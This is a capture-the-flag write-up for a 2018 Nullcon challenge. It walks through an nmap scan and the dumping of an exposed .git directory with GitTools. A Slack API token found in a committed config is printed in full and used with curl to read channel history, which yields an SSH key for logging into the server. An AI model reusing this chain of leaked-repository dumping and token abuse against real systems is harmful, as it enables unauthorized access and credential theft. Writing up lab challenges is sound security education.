Hackim Nullcon CTF – OSINT4
ID-10-T Team
In this challenge they give us an ip address and we have to exploit a configuration flaw, to return the control to the legitimate owners. The first thing, scan the ports for this IP address:
nmap -sS 54.85.105.103 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-11 13:08 EST Nmap scan report for ec2-54-85-105-103.compute-1.amazonaws.com (54.85.105.103) Host is up (0.18s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
We try to connect via HTTP:
The next is discover web content, for example, with burp intruder:
We have a git directory. Let’s download and analysis with GitTools:
Dump:
$ ./gitdumper.sh http://54.85.105.103/.git/ dump/ ########### # GitDumper is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### [*] Destination folder does not exist [+] Creating dump//.git/ [+] Downloaded: HEAD [-] Downloaded: objects/info/packs [+] Downloaded: description [+] Downloaded: config [-] Downloaded: COMMIT_EDITMSG [+] Downloaded: index [+] Downloaded: packed-refs [+] Downloaded: refs/heads/master [+] Downloaded: refs/remotes/origin/HEAD [-] Downloaded: refs/stash [+] Downloaded: logs/HEAD [+] Downloaded: logs/refs/heads/master [+] Downloaded: logs/refs/remotes/origin/HEAD [-] Downloaded: info/refs [+] Downloaded: info/exclude [+] Downloaded: objects/ac/fc9dc1aeb220fc298129e361657dcf29f9ca73 [-] Downloaded: objects/00/00000000000000000000000000000000000000 [+] Downloaded: objects/7c/3b9ebe9efb7c7a107dd50cfcea5a45294a5e21 [+] Downloaded: objects/e7/62de10c5cc16a55ab62ce2e86ea7cedee37119 [+] Downloaded: objects/69/070f481086429a5171eee0db344c6e5f763180 [+] Downloaded: objects/f4/dbd1e4160988fc21955029e43a07c29e647461 [+] Downloaded: objects/0d/63125df015d371b7cbddc3ab41afa517784ca0 [+] Downloaded: objects/08/c42890845313fe6ce1cba1d8724d894a616c58 [+] Downloaded: objects/0f/250d442daaaf05714ddb312d39df823f0abef7 [+] Downloaded: objects/2b/5c11fb5d58e3e2834fca06ac41b997aaceb3c1 [+] Downloaded: objects/14/552d0244d9d36bd862bd3af58b9424d05a145a
Extract:
$ ./extractor.sh ../Dumper/dump/ dump_extract/ ########### # Extractor is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### [*] Destination folder does not exist [*] Creating... [+] Found commit: 2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1 [+] Found file: /GitTools/Extractor/dump_extract/0-2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1/README.md [+] Found commit: 0d63125df015d371b7cbddc3ab41afa517784ca0 [+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/README.md [+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config [+] Found commit: e762de10c5cc16a55ab62ce2e86ea7cedee37119 [+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/README.md [+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/Slack Config [+] Found commit: acfc9dc1aeb220fc298129e361657dcf29f9ca73 [+] Found file: /GitTools/Extractor/dump_extract/3-acfc9dc1aeb220fc298129e361657dcf29f9ca73/README.md
We see the «Slack Config»:
$cat "/GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config" Organisation Slack https://corpnull.slack.com Slack Token: xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5
We have a Slack token, let’s play with Slack API. List channels:
$curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' -H 'Content-type: application/x-www-form-urlencoded' https://slack.com/api/channels.list
The most interesting channel is «C8Y41NDEJ»:
Next, we view the conversations in this channel:
$curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' -H 'Content-type: application/x-www-form-urlencoded' "https://slack.com/api/chanhistory?token=xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5&channel=C8Y41NDEJ"
In slack chat we found a RSA private key and username that we use for connect to ssh server:
$ ssh mikeatcorp@54.85.105.103
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-1047-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Get cloud support with Ubuntu Advantage Cloud Guest:
http://www.ubuntu.com/business/services/cloud
24 packages can be updated.
0 updates are security updates.
*** System restart required ***
Last login: Sun Feb 11 11:16:33 2018 from
mikeatcorp@ip-172-30-1-179:~$ locate flag.txt
/secret/.supersecret/flag.txt
mikeatcorp@ip-172-30-1-179:~$ cat /secret/.supersecret/flag.txt
hackim18{'455676878965435365788698546'}
mikeatcorp@ip-172-30-1-179:~$
Flag: hackim18{‘455676878965435365788698546’}
Thanks to DanitorwS for solve some problem with this challenge.
Cheers.